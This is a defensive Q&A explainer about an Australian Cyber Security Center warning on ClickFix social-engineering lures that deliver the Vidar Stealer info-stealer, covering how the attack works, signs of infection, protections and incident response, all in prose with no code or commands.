ClickFix Attacks and Vidar Stealer: What You Need to Know

The Australian Cyber Security Center (ACSC) has issued a warning about a malicious campaign that leverages the ClickFix social engineering technique to distribute the Vidar Stealer info-stealing malware. This Q&A covers the key details about the attack, how it works, and how to defend against it.

What is the ClickFix social engineering technique?

ClickFix is a deceptive technique used by cybercriminals to trick users into performing actions that compromise their security. It typically involves fake error messages or security alerts that prompt the user to click a button to ‘fix’ an issue. For example, a pop-up might claim that a software update is required or that a security problem needs immediate attention. When the user clicks the button, they unknowingly initiate a download or execute a malicious script. The technique exploits urgency and trust, making victims more likely to act without verifying the source. In the context of this campaign, ClickFix is used as the initial vector to deliver the Vidar Stealer malware.

What is Vidar Stealer and how does it work?

Vidar Stealer is a type of info-stealing malware that targets sensitive data from infected systems. Once installed, it collects credentials stored in browsers (such as saved passwords and cookies), cryptocurrency wallet information, browser history, and other personal data. It can also capture screenshots and steal files from specific directories. The malware operates stealthily in the background, then exfiltrates the stolen data to a command-and-control server operated by the attackers. Vidar Stealer is often sold on cybercrime forums as a commodity malware, making it accessible to a wide range of threat actors. Its primary goal is financial gain through credential theft, account takeovers, or cryptocurrency theft.

Who is behind this campaign and who are the targets?

The ACSC has identified the campaign as ongoing but has not attributed it to a specific threat actor. The targeting appears to be broad, affecting both individuals and organizations across various sectors. Given the use of ClickFix, which can be deployed via phishing emails, malicious websites, or even fake tech support calls, the campaign likely aims to infect as many users as possible. The Vidar Stealer payload is effective against Windows systems, and the stolen information can be used for further attacks, such as credential stuffing or spear-phishing. The geographic scope may be global, but the ACSC warning specifically addresses Australian businesses and residents. Organizations with valuable digital assets—like financial institutions, e-commerce sites, and cryptocurrency exchanges—are especially at risk.

How does the ClickFix attack deliver Vidar Stealer?

The attack sequence typically begins with a social engineering lure, such as an email or a pop-up ad that displays a fake error message. For instance, the user might see a notification claiming their system is infected and needs an immediate update. The message includes a ‘Fix Now’ button that, when clicked, downloads a malicious script or executable. In some variations, the ClickFix prompts the user to open a command prompt and run a command that downloads the Vidar Stealer payload from a remote server. This technique bypasses common security measures because the user intentionally performs the action. Once executed, Vidar Stealer silently installs and begins harvesting data. The campaign often uses obfuscation techniques to evade antivirus detection, such as encoding the payload or using legitimate services like GitHub or Dropbox to host the malicious files.

What are the signs of infection and how to detect it?

Signs of a Vidar Stealer infection may include unusual system behavior such as unexpected network traffic, slow performance, or browser redirects. Since the malware steals credentials, users might notice unauthorized account logins or cryptocurrency transactions they did not initiate. To detect the infection, organizations can monitor for suspicious processes running from temporary folders or unusual command executions that match known Vidar Stealer indicators. Security teams should also look for outbound connections to IP addresses or domains associated with malware distribution. Endpoint detection and response (EDR) tools may flag the behavior of the malware attempting to access browser databases or password stores. Regular scanning with updated antivirus software can also identify the malicious files, though advanced variants may evade signature-based detection. If an infection is suspected, immediate isolation of the affected system is recommended.

How can organizations protect themselves from ClickFix attacks?

1. Employee training: Educate users about social engineering techniques like ClickFix. Emphasize not clicking on unexpected pop-ups or error messages, especially those requesting system-level actions.
2. Technical controls: Block known malicious domains and implement web filtering to prevent access to adware or fake update sites. Restrict the ability to run scripts from the command prompt for non-admin users.
3. Application whitelisting: Only allow approved software to execute, reducing the chance of unverified payloads running.
4. Keep software updated: Regular patches for browsers and operating systems can close vulnerabilities that ClickFix lures might exploit.
5. Use robust antivirus and EDR: Deploy tools that can detect anomalous behavior, even if the initial payload is obfuscated.
6. Incident response plan: Prepare a clear procedure for isolating infected machines and preserving forensic evidence.

What should you do if you suspect a Vidar Stealer infection?

If you suspect an infection, disconnect the device from the network immediately to prevent data exfiltration. Run a full antivirus scan using up-to-date definitions. If malicious files are found, follow your organization’s incident response plan, which should include reporting to relevant authorities like the ACSC. Change all passwords for accounts accessed from the infected device, starting with email and financial accounts. Enable multi-factor authentication on all critical services. Monitor for unusual activity in online accounts, especially cryptocurrency wallets. In severe cases, a forensic analysis may be needed to determine the full scope of the breach. The ACSC recommends reporting any compromises to them for tracking and potential mitigation actions.